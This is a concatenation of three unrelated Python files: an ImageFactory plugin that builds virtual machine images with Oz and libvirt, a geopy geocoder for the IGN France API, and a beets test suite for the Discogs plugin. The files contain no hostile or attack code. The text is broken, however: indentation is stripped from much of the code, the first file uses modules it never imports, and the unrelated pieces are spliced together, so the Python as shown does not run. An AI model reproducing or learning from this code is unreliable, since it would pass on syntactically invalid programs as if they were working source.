from imgfac.ReservationManager import ReservationManager
from imgfac.FactoryUtils import launch_inspect_and_mount, shutdown_and_close, remove_net_persist
from imgfac.OSDelegate import OSDelegate
from imgfac.FactoryUtils import parameter_cast_to_bool
from libvirt import libvirtError
from oz.OzException import OzException
import json
def subprocess_check_output(*popenargs, **kwargs):
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it will be overridden.')
process = subprocess.Popen(stdout=subprocess.PIPE, stderr=subprocess.STDOUT, *popenargs, **kwargs)
stdout, stderr = process.communicate()
retcode = process.poll()
if retcode:
cmd = ' '.join(*popenargs)
raise ImageFactoryException("'%s' failed(%d): %s" % (cmd, retcode, stderr))
return (stdout, stderr, retcode)
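# Sketch of a typical call; the command is illustrative only. stderr in the
# returned tuple is always None because it is folded into stdout via STDOUT:
#   stdout, stderr, retcode = subprocess_check_output(['uname', '-m'])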
class TinMan(object):
zope.interface.implements(OSDelegate)
def activity(self, activity):
# Simple helper function
# Activity should be a one line human-readable string indicating the task in progress
# We log it at DEBUG and also set it as the status_detail on our active image
self.log.debug(activity)
self.active_image.status_detail['activity'] = activity
## INTERFACE METHOD
def create_target_image(self, builder, target, base_image, parameters):
self.log.info('create_target_image() called for TinMan plugin - creating a TargetImage')
self.active_image = builder.target_image
self.target = target
self.base_image = builder.base_image
# populate our target_image bodyfile with the original base image
# which we do not want to modify in place
self.activity("Copying BaseImage to modifiable TargetImage")
self.log.debug("Copying base_image file (%s) to new target_image file (%s)" % (builder.base_image.data, builder.target_image.data))
oz.ozutil.copyfile_sparse(builder.base_image.data, builder.target_image.data)
self.image = builder.target_image.data
# Merge together any TDL-style customizations requested via our plugin-to-plugin interface
# with any target specific packages, repos and commands and then run a second Oz customization
# step.
self.tdlobj = oz.TDL.TDL(xmlstring=builder.base_image.template, rootpw_required=self.app_config["tdl_require_root_pw"])
# We remove any packages, commands and files from the original TDL - these have already been
# installed/executed. We leave the repos in place, as it is possible that the target
# specific packages or commands may require them.
self.tdlobj.packages = [ ]
self.tdlobj.commands = { }
self.tdlobj.files = { }
# This is user-defined target-specific packages and repos in a local config file
self.add_target_content()
# This is content deposited by cloud plugins - typically commands to run to prep the image further
self.merge_cloud_plugin_content()
# If there are no new commands, packages or files, we can stop here - there is no need to run Oz again
if (len(self.tdlobj.packages) + len(self.tdlobj.commands) + len(self.tdlobj.files)) == 0:
self.log.debug("No further modification of the TargetImage to perform in the OS Plugin - returning")
return
# We have some additional work to do - create a new Oz guest object that we can use to run the guest
# customization a second time
self._init_oz()
self.guest.diskimage = builder.target_image.data
libvirt_xml = self.guest._generate_xml("hd", None)
# One last step is required here - The persistent net rules in some Fedora and RHEL versions
# Will cause our new incarnation of the image to fail to get network - fix that here
# We unfortunately end up having to duplicate this a second time in the cloud plugins
# when we are done with our second stage customizations
# TODO: Consider moving all of that back here
guestfs_handle = launch_inspect_and_mount(builder.target_image.data)
remove_net_persist(guestfs_handle)
shutdown_and_close(guestfs_handle)
try:
self.log.debug("Doing second-stage target_image customization and ICICLE generation")
#self.percent_complete = 30
builder.target_image.icicle = self.guest.customize_and_generate_icicle(libvirt_xml)
self.log.debug("Customization and ICICLE generation complete")
#self.percent_complete = 50
finally:
self.activity("Cleaning up install artifacts")
self.guest.cleanup_install()
def add_cloud_plugin_content(self, content):
# This is a method that cloud plugins can call to deposit content/commands to be run
# during the OS-specific first stage of the Target Image creation.
# The expected input is a dict containing commands and files
# No support for repos at the moment as these introduce external deps that we may not be able to count on
# Add this to an array which will later be merged into the TDL object used to drive Oz
self.cloud_plugin_content.append(content)
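    # Example (hypothetical) content dict a cloud plugin might deposit -- this
    # is the shape merge_cloud_plugin_content() below consumes:
    #   {'files': [{'name': '/etc/motd', 'type': 'raw', 'file': 'built by imagefactory'}],
    #    'commands': [{'name': 'clean', 'type': 'raw', 'command': 'yum clean all'}]}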
def merge_cloud_plugin_content(self):
for content in self.cloud_plugin_content:
if 'files' in content:
for fileentry in content['files']:
if not 'name' in fileentry:
raise ImageFactoryException("File given without a name")
if not 'type' in fileentry:
raise ImageFactoryException("File given without a type")
if not 'file' in fileentry:
raise ImageFactoryException("File given without any content")
if fileentry['type'] == 'raw':
self.tdlobj.files[fileentry['name']] = fileentry['file']
elif fileentry['type'] == 'base64':
if len(fileentry['file']) == 0:
self.tdlobj.files[fileentry['name']] = ""
else:
self.tdlobj.files[fileentry['name']] = base64.b64decode(fileentry['file'])
else:
raise ImageFactoryException("File given with invalid type (%s)" % (fileentry['type']))
if 'commands' in content:
for command in content['commands']:
if not 'name' in command:
raise ImageFactoryException("Command given without a name")
if not 'type' in command:
raise ImageFactoryException("Command given without a type")
if not 'command' in command:
raise ImageFactoryException("Command given without any content")
if command['type'] == 'raw':
self.tdlobj.commands[command['name']] = command['command']
elif command['type'] == 'base64':
if len(command['command']) == 0:
self.log.warning("Command with zero length given")
self.tdlobj.commands[command['name']] = ""
else:
self.tdlobj.commands[command['name']] = base64.b64decode(command['command'])
else:
raise ImageFactoryException("Command given with invalid type (%s)" % (command['type']))
def add_target_content(self):
"""Merge in target specific package and repo content.
TDL object must already exist as self.tdlobj"""
doc = None
if isfile("/etc/imagefactory/target_content.xml"):
doc = libxml2.parseFile("/etc/imagefactory/target_content.xml")
else:
self.log.debug("Found neither a call-time config nor a config file - doing nothing")
return
# Purely to make the xpath statements below a tiny bit shorter
target = self.target
os=self.tdlobj.distro
version=self.tdlobj.update
arch=self.tdlobj.arch
# We go from most to least specific in this order:
        #   arch -> version -> os -> target
        # Note that at the moment we even allow an include statement that covers absolutely everything.
# That is, one that doesn't even specify a target - this is to support a very simple call-time syntax
include = doc.xpathEval("/template_includes/include[@target='%s' and @os='%s' and @version='%s' and @arch='%s']" %
(target, os, version, arch))
if len(include) == 0:
include = doc.xpathEval("/template_includes/include[@target='%s' and @os='%s' and @version='%s' and not(@arch)]" %
(target, os, version))
if len(include) == 0:
include = doc.xpathEval("/template_includes/include[@target='%s' and @os='%s' and not(@version) and not(@arch)]" %
(target, os))
if len(include) == 0:
include = doc.xpathEval("/template_includes/include[@target='%s' and not(@os) and not(@version) and not(@arch)]" %
(target))
if len(include) == 0:
include = doc.xpathEval("/template_includes/include[not(@target) and not(@os) and not(@version) and not(@arch)]")
if len(include) == 0:
self.log.debug("cannot find a config section that matches our build details - doing nothing")
return
# OK - We have at least one config block that matches our build - take the first one, merge it and be done
# TODO: Merge all of them? Err out if there is more than one? Warn?
include = include[0]
packages = include.xpathEval("packages")
if len(packages) > 0:
self.tdlobj.merge_packages(str(packages[0]))
repositories = include.xpathEval("repositories")
if len(repositories) > 0:
self.tdlobj.merge_repositories(str(repositories[0]))
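    # Example (hypothetical) /etc/imagefactory/target_content.xml fragment; the
    # xpath cascade above would match this include when building a Fedora 17
    # x86_64 image for the 'ec2' target:
    #   <template_includes>
    #     <include target='ec2' os='Fedora' version='17' arch='x86_64'>
    #       <packages><package name='cloud-init'/></packages>
    #     </include>
    #   </template_includes>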
def __init__(self):
super(TinMan, self).__init__()
self.cloud_plugin_content = [ ]
config_obj = ApplicationConfiguration()
self.app_config = config_obj.configuration
self.res_mgr = ReservationManager()
self.log = logging.getLogger('%s.%s' % (__name__, self.__class__.__name__))
self.parameters = None
self.install_script_object = None
self.guest = None
def abort(self):
self.log.debug("ABORT called in TinMan plugin")
# If we have an active Oz VM destroy it - if not do nothing but log why we did nothing
if not self.guest:
self.log.debug("No Oz guest object present - nothing to do")
return
try:
# Oz doesn't keep the active domain object as an instance variable so we have to look it up
guest_dom = self.guest.libvirt_conn.lookupByName(self.tdlobj.name)
except Exception, e:
self.log.exception(e)
self.log.debug("No Oz VM found with name (%s) - nothing to do" % (self.tdlobj.name))
self.log.debug("This likely means the local VM has already been destroyed or never started")
return
try:
self.log.debug("Attempting to destroy local guest/domain (%s)" % (self.tdlobj.name))
guest_dom.destroy()
except Exception, e:
self.log.exception(e)
self.log.warning("Exception encountered while destroying domain - it may still exist")
def _init_oz(self):
# TODO: This is a convenience variable for refactoring - rename
self.new_image_id = self.active_image.identifier
# Create a name combining the TDL name and the UUID for use when tagging EC2 AMIs
self.longname = self.tdlobj.name + "-" + self.new_image_id
# Oz assumes unique names - TDL built for multiple backends guarantees they are not unique
# We don't really care about the name so just force uniqueness
# 18-Jul-2011 - Moved to constructor and modified to change TDL object name itself
# Oz now uses the tdlobject name property directly in several places so we must change it
self.tdlobj.name = "factory-build-" + self.new_image_id
# populate a config object to pass to OZ; this allows us to specify our
# own output dir but inherit other Oz behavior
self.oz_config = ConfigParser.SafeConfigParser()
if self.oz_config.read("/etc/oz/oz.cfg") != []:
if self.parameters.get("oz_overrides", None) != None:
oz_overrides = json.loads(self.parameters.get("oz_overrides",None).replace("'", "\""))
for i in oz_overrides:
for key,val in oz_overrides[i].items():
self.oz_config.set(i, key, str(val))
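                # Example (hypothetical) oz_overrides parameter value -- single-
                # quoted JSON mapping Oz config sections to key/value overrides:
                #   "{'libvirt': {'memory': 2048}, 'timeouts': {'install': 7200}}"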
self.oz_config.set('paths', 'output_dir', self.app_config["imgdir"])
if "oz_data_dir" in self.app_config:
self.oz_config.set('paths', 'data_dir', self.app_config["oz_data_dir"])
if "oz_screenshot_dir" in self.app_config:
self.oz_config.set('paths', 'screenshot_dir', self.app_config["oz_screenshot_dir"])
print "=============== Final Oz Config ================"
for section in self.oz_config.sections():
print "[ {0} ]".format(section)
for option in self.oz_config.options(section):
print " {0} = {1}".format(option, self.oz_config.get(section,option))
else:
raise ImageFactoryException("No Oz config file found. Can't continue.")
# make this a property to enable quick cleanup on abort
self.instance = None
# Here we are always dealing with a local install
self.init_guest()
## INTERFACE METHOD
def create_base_image(self, builder, template, parameters):
self.log.info('create_base_image() called for TinMan plugin - creating a BaseImage')
self.tdlobj = oz.TDL.TDL(xmlstring=template.xml, rootpw_required=self.app_config["tdl_require_root_pw"])
if parameters:
self.parameters = parameters
else:
self.parameters = { }
# TODO: Standardize reference scheme for the persistent image objects in our builder
# Having local short-name copies like this may well be a good idea though they
# obscure the fact that these objects are in a container "upstream" of our plugin object
self.base_image = builder.base_image
# Set to the image object that is actively being created or modified
# Used in the logging helper function above
self.active_image = self.base_image
try:
self._init_oz()
self.guest.diskimage = self.base_image.data
self.activity("Cleaning up any old Oz guest")
self.guest.cleanup_old_guest()
self.activity("Generating JEOS install media")
self.threadsafe_generate_install_media(self.guest)
self.percent_complete=10
# We want to save this later for use by RHEV-M and Condor clouds
libvirt_xml=""
gfs = None
try:
self.activity("Generating JEOS disk image")
# Newer Oz versions introduce a configurable disk size in TDL
# We must still detect that it is present and pass it in this call
                disksize = getattr(self.guest, "disksize", 10)
self.guest.generate_diskimage(size = disksize)
# TODO: If we already have a base install reuse it
# subject to some rules about updates to underlying repo
self.activity("Execute JEOS install")
libvirt_xml = self.guest.install(self.app_config["timeout"])
self.base_image.parameters['libvirt_xml'] = libvirt_xml
self.image = self.guest.diskimage
self.log.debug("Base install complete - Doing customization and ICICLE generation")
self.percent_complete = 30
# Power users may wish to avoid ever booting the guest after the installer is finished
# They can do so by passing in a { "generate_icicle": False } KV pair in the parameters dict
if parameter_cast_to_bool(self.parameters.get("generate_icicle", True)):
if parameter_cast_to_bool(self.parameters.get("offline_icicle", False)):
self.guest.customize(libvirt_xml)
gfs = launch_inspect_and_mount(self.image, readonly=True)
# Monkey-patching is bad
# TODO: Work with Chris to incorporate a more elegant version of this into Oz itself
def libguestfs_execute_command(gfs, cmd, timeout):
stdout = gfs.sh(cmd)
return (stdout, None, 0)
self.guest.guest_execute_command = libguestfs_execute_command
builder.base_image.icicle = self.guest.do_icicle(gfs)
else:
builder.base_image.icicle = self.guest.customize_and_generate_icicle(libvirt_xml)
else:
self.guest.customize(libvirt_xml)
self.log.debug("Customization and ICICLE generation complete")
self.percent_complete = 50
finally:
self.activity("Cleaning up install artifacts")
if self.guest:
self.guest.cleanup_install()
if self.install_script_object:
# NamedTemporaryFile - removed on close
self.install_script_object.close()
if gfs:
shutdown_and_close(gfs)
self.log.debug("Generated disk image (%s)" % (self.guest.diskimage))
# OK great, we now have a customized KVM image
finally:
pass
# TODO: Create the base_image object representing this
# TODO: Create the base_image object at the beginning and then set the diskimage accordingly
def init_guest(self):
# Use the factory function from Oz directly
# This raises an exception if the TDL contains an unsupported distro or version
# Cloud plugins that use KVM directly, such as RHEV-M and openstack-kvm can accept
# any arbitrary guest that Oz is capable of producing
install_script_name = None
install_script = self.parameters.get("install_script", None)
if install_script:
self.install_script_object = NamedTemporaryFile()
self.install_script_object.write(install_script)
self.install_script_object.flush()
install_script_name = self.install_script_object.name
try:
self.guest = oz.GuestFactory.guest_factory(self.tdlobj, self.oz_config, install_script_name)
# Oz just selects a random port here - This could potentially collide if we are unlucky
self.guest.listen_port = self.res_mgr.get_next_listen_port()
except libvirtError, e:
raise ImageFactoryException("Cannot connect to libvirt. Make sure libvirt is running. [Original message: %s]" % e.message)
except OzException, e:
if "Unsupported" in e.message:
raise ImageFactoryException("TinMan plugin does not support distro (%s) update (%s) in TDL" % (self.tdlobj.distro, self.tdlobj.update) )
else:
raise e
def log_exc(self):
self.log.debug("Exception caught in ImageFactory")
self.log.debug(traceback.format_exc())
        self.active_image.status_detail['error'] = traceback.format_exc()
def threadsafe_generate_install_media(self, guest):
# Oz caching of install media and modified install media is not thread safe
# Make it safe here using some locks
# We can only have one active generate_install_media() call for each unique tuple:
# (OS, update, architecture, installtype)
tdl = guest.tdl
queue_name = "%s-%s-%s-%s" % (tdl.distro, tdl.update, tdl.arch, tdl.installtype)
self.res_mgr.get_named_lock(queue_name)
try:
guest.generate_install_media(force_download=False)
finally:
self.res_mgr.release_named_lock(queue_name)
|
|
"""
:class:`.IGNFrance` is the IGN France Geocoder.
"""
import xml.etree.ElementTree as ET
from geopy.compat import (urlencode, HTTPPasswordMgrWithDefaultRealm,
HTTPBasicAuthHandler, build_opener, u,
install_opener, iteritems, Request)
from geopy.geocoders.base import Geocoder, DEFAULT_TIMEOUT, DEFAULT_SCHEME
from geopy.exc import (
GeocoderQueryError,
ConfigurationError,
)
from geopy.location import Location
from geopy.util import logger
__all__ = ("IGNFrance", )
class IGNFrance(Geocoder): # pylint: disable=W0223
"""
Geocoder using the IGN France GeoCoder OpenLS API. Documentation at:
http://api.ign.fr/tech-docs-js/fr/developpeur/search.html
"""
xml_request = """<?xml version="1.0" encoding="UTF-8"?>
<XLS version="1.2"
xmlns="http://www.opengis.net/xls"
xmlns:gml="http://www.opengis.net/gml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.opengis.net/xls
http://schemas.opengis.net/ols/1.2/olsAll.xsd">
<RequestHeader srsName="epsg:4326"/>
<Request methodName="{method_name}"
maximumResponses="{maximum_responses}"
requestID=""
version="1.2">
{sub_request}
</Request>
</XLS>"""
def __init__(
self,
api_key,
username=None,
password=None,
referer=None,
domain='wxs.ign.fr',
scheme=DEFAULT_SCHEME,
timeout=DEFAULT_TIMEOUT,
proxies=None,
): # pylint: disable=R0913
"""
Initialize a customized IGN France geocoder.
:param string api_key: The API key required by IGN France API
to perform geocoding requests. You can get your key here:
            http://api.ign.fr. Mandatory. Note that the API key differs
            depending on whether referer-based or username/password-based
            authentication is used.
        :param string username: The username required for HTTP Basic
            authentication. Mandatory if no referer is set.
        :param string password: The password required for HTTP Basic
            authentication. Mandatory if no referer is set.
        :param string referer: The HTTP referer required when calling the
            API. Mandatory if username and password are not set.
        :param string domain: Currently 'wxs.ign.fr'; this can be changed
            for testing against the developer API, e.g. 'gpp3-wxs.ign.fr'
            at the moment.
:param string scheme: Use 'https' or 'http' as the API URL's scheme.
Default is https. Note that SSL connections' certificates are not
verified.
:param int timeout: Time, in seconds, to wait for the geocoding service
to respond before raising a :class:`geopy.exc.GeocoderTimedOut`
exception. Set this only if you wish to override, on this call
only, the value set during the geocoder's initialization.
:param dict proxies: If specified, routes this geocoder's requests
through the specified proxy. E.g., {"https": "192.0.2.0"}. For
more information, see documentation on
:class:`urllib2.ProxyHandler`.
"""
super(IGNFrance, self).__init__(
scheme=scheme, timeout=timeout, proxies=proxies
)
# Catch if no api key with username and password
# or no api key with referer
if not (api_key and username and password) \
and not (api_key and referer):
raise ConfigurationError('You should provide an api key and a '
'username with a password or an api '
'key with a referer depending on '
'created api key')
if (username and password) and referer:
raise ConfigurationError('You can\'t set username/password and '
'referer together. The API key always '
'differs depending on both scenarios')
if username and not password:
raise ConfigurationError(
'username and password must be set together'
)
self.api_key = api_key
self.username = username
self.password = password
self.referer = referer
self.domain = domain.strip('/')
self.api = "{scheme}://{domain}/{api_key}/geoportail/ols".format(
scheme=self.scheme,
api_key=self.api_key,
domain=self.domain
)
if username and password and referer is None:
self.addSimpleHTTPAuthHeader()
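    # Two (hypothetical) valid configurations mirroring the checks above --
    # referer-keyed or basic-auth-keyed, never both:
    #   IGNFrance(api_key='REFERER_KEY', referer='http://example.com')
    #   IGNFrance(api_key='AUTH_KEY', username='me', password='secret')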
def geocode(
self,
query,
query_type='StreetAddress',
maximum_responses=25,
is_freeform=False,
filtering=None,
exactly_one=True,
timeout=None
): # pylint: disable=W0221,R0913
"""
Geocode a location query.
:param string query: The query string to be geocoded.
:param string query_type: The type to provide for geocoding. It can be
PositionOfInterest, StreetAddress or CadastralParcel.
StreetAddress is the default choice if none provided.
:param int maximum_responses: The maximum number of responses
to ask to the API in the query body.
        :param bool is_freeform: Whether the result is returned as a single
            free-form string or in a more structured form.
            By default, value is False.
:param string filtering: Provide string that help setting geocoder
filter. It contains an XML string. See examples in documentation
and ignfrance.py file in directory tests.
:param bool exactly_one: Return one result or a list of results, if
available.
:param int timeout: Time, in seconds, to wait for the geocoding service
to respond before raising a :class:`geopy.exc.GeocoderTimedOut`
exception. Set this only if you wish to override, on this call
only, the value set during the geocoder's initialization.
"""
# Check if acceptable query type
if query_type not in ['PositionOfInterest',
'StreetAddress',
'CadastralParcel']:
raise GeocoderQueryError("""You did not provided a query_type the
webservice can consume. It should be PositionOfInterest,
'StreetAddress or CadastralParcel""")
# Check query validity for CadastralParcel
if query_type == 'CadastralParcel' and len(query.strip()) != 14:
raise GeocoderQueryError("""You must send a string of fourteen
characters long to match the cadastre required code""")
sub_request = """
<GeocodeRequest returnFreeForm="{is_freeform}">
<Address countryCode="{query_type}">
<freeFormAddress>{query}</freeFormAddress>
{filtering}
</Address>
</GeocodeRequest>
"""
xml_request = self.xml_request.format(
method_name='LocationUtilityService',
sub_request=sub_request,
maximum_responses=maximum_responses
)
# Manage type change for xml case sensitive
if is_freeform:
is_freeform = 'true'
else:
is_freeform = 'false'
# Manage filtering value
if filtering is None:
filtering = ''
# Create query using parameters
request_string = xml_request.format(
is_freeform=is_freeform,
query=query,
query_type=query_type,
filtering=filtering
)
params = {
'xls': request_string
}
url = "?".join((self.api, urlencode(params)))
logger.debug("%s.geocode: %s", self.__class__.__name__, url)
raw_xml = self._request_raw_content(url, timeout)
return self._parse_xml(
raw_xml,
is_freeform=is_freeform,
exactly_one=exactly_one
)
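# Illustrative call (hypothetical values); `filtering`, when given, is raw
# XML as described in the docstring above:
#
#     geocoder.geocode('rennes', query_type='PositionOfInterest',
#                      exactly_one=True)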
def reverse(
self,
query,
reverse_geocode_preference=('StreetAddress', ),
maximum_responses=25,
filtering='',
exactly_one=False,
timeout=None
): # pylint: disable=W0221,R0913
"""
Given a point, find an address.
:param query: The coordinates for which you wish to obtain the
closest human-readable addresses.
:type query: :class:`geopy.point.Point`, list or tuple of (latitude,
longitude), or string as "%(latitude)s, %(longitude)s"
:param list reverse_geocode_preference: The expected result types.
Each entry can be StreetAddress or PositionOfInterest.
Defaults to StreetAddress.
:param int maximum_responses: The maximum number of responses
to request from the API in the query body.
:param string filtering: An XML string used to filter the
geocoder's results. See the examples in the documentation
and in the ignfrance.py file in the tests directory.
:param boolean exactly_one: Return one result or a list of results, if
available.
:param int timeout: Time, in seconds, to wait for the geocoding service
to respond before raising a :class:`geopy.exc.GeocoderTimedOut`
exception. Set this only if you wish to override, on this call
only, the value set during the geocoder's initialization.
"""
sub_request = """
<ReverseGeocodeRequest>
{reverse_geocode_preference}
<Position>
<gml:Point>
<gml:pos>{query}</gml:pos>
</gml:Point>
{filtering}
</Position>
</ReverseGeocodeRequest>
"""
xml_request = self.xml_request.format(
method_name='ReverseGeocodeRequest',
sub_request=sub_request,
maximum_responses=maximum_responses
)
for pref in reverse_geocode_preference:
if pref not in ('StreetAddress', 'PositionOfInterest'):
raise GeocoderQueryError(
'`reverse_geocode_preference` must contain '
'one or more of: StreetAddress, PositionOfInterest'
)
point = self._coerce_point_to_string(query).replace(',', ' ')
reverse_geocode_preference = '\n'.join((
'<ReverseGeocodePreference>%s</ReverseGeocodePreference>' % pref
for pref
in reverse_geocode_preference
))
request_string = xml_request.format(
maximum_responses=maximum_responses,
query=point,
reverse_geocode_preference=reverse_geocode_preference,
filtering=filtering
)
url = "?".join((self.api, urlencode({'xls': request_string})))
logger.debug("%s.reverse: %s", self.__class__.__name__, url)
raw_xml = self._request_raw_content(url, timeout)
return self._parse_xml(
raw_xml,
exactly_one=exactly_one,
is_reverse=True,
is_freeform='false'
)
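# Illustrative reverse call (hypothetical coordinates); the query may be a
# Point, a (latitude, longitude) tuple, or a "lat, lng" string:
#
#     geocoder.reverse('48.8033, 2.3241',
#                      reverse_geocode_preference=('StreetAddress',),
#                      exactly_one=True)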
def addSimpleHTTPAuthHeader(self):
"""
Create and install a urllib opener embedding HTTP simple authentication
"""
sub_request = """
<GeocodeRequest returnFreeForm="{is_freeform}">
<Address countryCode="{query_type}">
<freeFormAddress>{query}</freeFormAddress>
</Address>
</GeocodeRequest>
"""
xml_request = self.xml_request.format(
method_name='LocationUtilityService',
sub_request=sub_request,
maximum_responses=1
)
# Create query using parameters
request_string = xml_request.format(
is_freeform='false',
query='rennes',
query_type='PositionOfInterest'
)
params = {
'xls': request_string
}
top_level_url = "?".join((self.api, urlencode(params)))
password_mgr = HTTPPasswordMgrWithDefaultRealm()
# Add the username and password.
# If we knew the realm, we could use it instead of None.
password_mgr.add_password(
None,
top_level_url,
self.username,
self.password
)
handler = HTTPBasicAuthHandler(password_mgr)
# create "opener" (OpenerDirector instance)
opener = build_opener(handler)
# Install the opener.
# Now all calls to urllib.request.urlopen use our opener.
install_opener(opener)
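# Note that install_opener() replaces the process-wide default opener, so
# the basic-auth credentials above apply to every subsequent urlopen()
# call in the process, not only to this geocoder's requests.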
def _parse_xml(self,
page,
is_reverse=False,
is_freeform=False,
exactly_one=True):
"""
Returns location, (latitude, longitude) from the XML feed,
after transforming it into json-like dicts
"""
# Parse the page
tree = ET.fromstring(page.encode('utf-8'))
# Clean tree from namespace to facilitate XML manipulation
def remove_namespace(doc, namespace):
"""Remove namespace in the document in place."""
ns = '{%s}' % namespace
ns = u(ns)
nsl = len(ns)
for elem in doc.getiterator():
if elem.tag.startswith(ns):
elem.tag = elem.tag[nsl:]
remove_namespace(tree, 'http://www.opengis.net/gml')
remove_namespace(tree, 'http://www.opengis.net/xls')
remove_namespace(tree, 'http://www.opengis.net/xlsext')
# Return places as json instead of XML
places = self._xml_to_json_places(tree, is_reverse=is_reverse)
if exactly_one:
return self._parse_place(places[0], is_freeform=is_freeform)
else:
return [
self._parse_place(
place,
is_freeform=is_freeform
) for place in places
]
@staticmethod
def _xml_to_json_places(tree, is_reverse=False):
"""
Transform the XML ElementTree returned by the webservice into json-like dicts
"""
select_multi = (
'GeocodedAddress'
if not is_reverse
else 'ReverseGeocodedLocation'
)
adresses = tree.findall('.//' + select_multi)
places = []
sel_pl = './/Address/Place[@type="{}"]'
for adr in adresses:
el = {}
el['pos'] = adr.find('./Point/pos')
el['street'] = adr.find('.//Address/StreetAddress/Street')
el['freeformaddress'] = adr.find('.//Address/freeFormAddress')
el['municipality'] = adr.find(sel_pl.format('Municipality'))
el['numero'] = adr.find(sel_pl.format('Numero'))
el['feuille'] = adr.find(sel_pl.format('Feuille'))
el['section'] = adr.find(sel_pl.format('Section'))
el['departement'] = adr.find(sel_pl.format('Departement'))
el['commune_absorbee'] = adr.find(sel_pl.format('CommuneAbsorbee'))
el['commune'] = adr.find(sel_pl.format('Commune'))
el['insee'] = adr.find(sel_pl.format('INSEE'))
el['qualite'] = adr.find(sel_pl.format('Qualite'))
el['territoire'] = adr.find(sel_pl.format('Territoire'))
el['id'] = adr.find(sel_pl.format('ID'))
el['id_tr'] = adr.find(sel_pl.format('ID_TR'))
el['bbox'] = adr.find(sel_pl.format('Bbox'))
el['nature'] = adr.find(sel_pl.format('Nature'))
el['postal_code'] = adr.find('.//Address/PostalCode')
el['extended_geocode_match_code'] = adr.find(
'.//ExtendedGeocodeMatchCode'
)
place = {}
def testContentAttrib(selector, key):
"""
Helper to fetch an attribute from an element; returns
None when the element or the attribute is missing
"""
return selector.attrib.get(
key,
None
) if selector is not None else None
place['accuracy'] = testContentAttrib(
adr.find('.//GeocodeMatchCode'), 'accuracy')
place['match_type'] = testContentAttrib(
adr.find('.//GeocodeMatchCode'), 'matchType')
place['building'] = testContentAttrib(
adr.find('.//Address/StreetAddress/Building'), 'number')
place['search_centre_distance'] = testContentAttrib(
adr.find('.//SearchCentreDistance'), 'value')
for key, value in iteritems(el):
place[key] = value.text if value is not None else None
# We check if lat lng is not empty and unpack accordingly
if place['pos']:
lat, lng = place['pos'].split(' ')
place['lat'] = lat.strip()
place['lng'] = lng.strip()
else:
place['lat'] = place['lng'] = None
# Remove the now-unused key
place.pop("pos", None)
places.append(place)
return places
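# Each returned place is a flat dict; a typical (hypothetical) entry
# looks roughly like:
#
#     {'freeformaddress': '2 Avenue Jean Jaures 75019 Paris',
#      'lat': '48.88', 'lng': '2.38', 'accuracy': '1.0', ...}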
def _request_raw_content(self, url, timeout):
"""
Send the request to get raw content.
"""
request = Request(url)
if self.referer is not None:
request.add_header('Referer', self.referer)
raw_xml = self._call_geocoder(
request,
timeout=timeout,
deserializer=None
)
return raw_xml
@staticmethod
def _parse_place(place, is_freeform=None):
"""
Get the location, lat, lng and place from a single json place.
"""
# When freeform, the result already contains the full address
if is_freeform == 'true':
location = place.get('freeformaddress')
else:
# For parcelle
if place.get('numero'):
location = place.get('street')
else:
# When classic geocoding
# or when reverse geocoding
location = "%s %s" % (
place.get('postal_code', ''),
place.get('commune', ''),
)
if place.get('street'):
location = "%s, %s" % (
place.get('street', ''),
location,
)
if place.get('building'):
location = "%s %s" % (
place.get('building', ''),
location,
)
return Location(location, (place.get('lat'), place.get('lng')), place)
|
|
# -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2016, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Tests for discogs plugin.
"""
from __future__ import division, absolute_import, print_function
import unittest
from test import _common
from test._common import Bag
from test.helper import capture_log
from beetsplug.discogs import DiscogsPlugin
class DGAlbumInfoTest(_common.TestCase):
def _make_release(self, tracks=None):
"""Returns a Bag that mimics a discogs_client.Release. The list
of elements on the returned Bag is incomplete, including just
those required for the tests on this class."""
data = {
'id': 'ALBUM ID',
'uri': 'https://www.discogs.com/release/release/13633721',
'title': 'ALBUM TITLE',
'year': '3001',
'artists': [{
'name': 'ARTIST NAME',
'id': 'ARTIST ID',
'join': ','
}],
'formats': [{
'descriptions': ['FORMAT DESC 1', 'FORMAT DESC 2'],
'name': 'FORMAT',
'qty': 1
}],
'styles': [
'STYLE1', 'STYLE2'
],
'genres': [
'GENRE1', 'GENRE2'
],
'labels': [{
'name': 'LABEL NAME',
'catno': 'CATALOG NUMBER',
}],
'tracklist': []
}
if tracks:
for recording in tracks:
data['tracklist'].append(recording)
return Bag(data=data,
# Make some fields available as properties, as they are
# accessed by DiscogsPlugin methods.
title=data['title'],
artists=[Bag(data=d) for d in data['artists']])
def _make_track(self, title, position='', duration='', type_=None):
track = {
'title': title,
'position': position,
'duration': duration
}
if type_ is not None:
# Test samples on discogs_client do not have a 'type_' field, but
# the API seems to return it. Values: 'track' for regular tracks,
# 'heading' for descriptive texts (i.e. not real tracks - 12.13.2).
track['type_'] = type_
return track
def _make_release_from_positions(self, positions):
"""Return a Bag that mimics a discogs_client.Release with a
tracklist where tracks have the specified `positions`."""
tracks = [self._make_track('TITLE%s' % i, position) for
(i, position) in enumerate(positions, start=1)]
return self._make_release(tracks)
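# For example, _make_release_from_positions(['A1', 'B1']) yields a release
# whose tracklist holds two tracks titled 'TITLE1' and 'TITLE2' at
# positions 'A1' and 'B1'.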
def test_parse_media_for_tracks(self):
tracks = [self._make_track('TITLE ONE', '1', '01:01'),
self._make_track('TITLE TWO', '2', '02:02')]
release = self._make_release(tracks=tracks)
d = DiscogsPlugin().get_album_info(release)
t = d.tracks
self.assertEqual(d.media, 'FORMAT')
self.assertEqual(t[0].media, d.media)
self.assertEqual(t[1].media, d.media)
def test_parse_medium_numbers_single_medium(self):
release = self._make_release_from_positions(['1', '2'])
d = DiscogsPlugin().get_album_info(release)
t = d.tracks
self.assertEqual(d.mediums, 1)
self.assertEqual(t[0].medium, 1)
self.assertEqual(t[0].medium_total, 2)
self.assertEqual(t[1].medium, 1)
self.assertEqual(t[1].medium_total, 2)
def test_parse_medium_numbers_two_mediums(self):
release = self._make_release_from_positions(['1-1', '2-1'])
d = DiscogsPlugin().get_album_info(release)
t = d.tracks
self.assertEqual(d.mediums, 2)
self.assertEqual(t[0].medium, 1)
self.assertEqual(t[0].medium_total, 1)
self.assertEqual(t[1].medium, 2)
self.assertEqual(t[1].medium_total, 1)
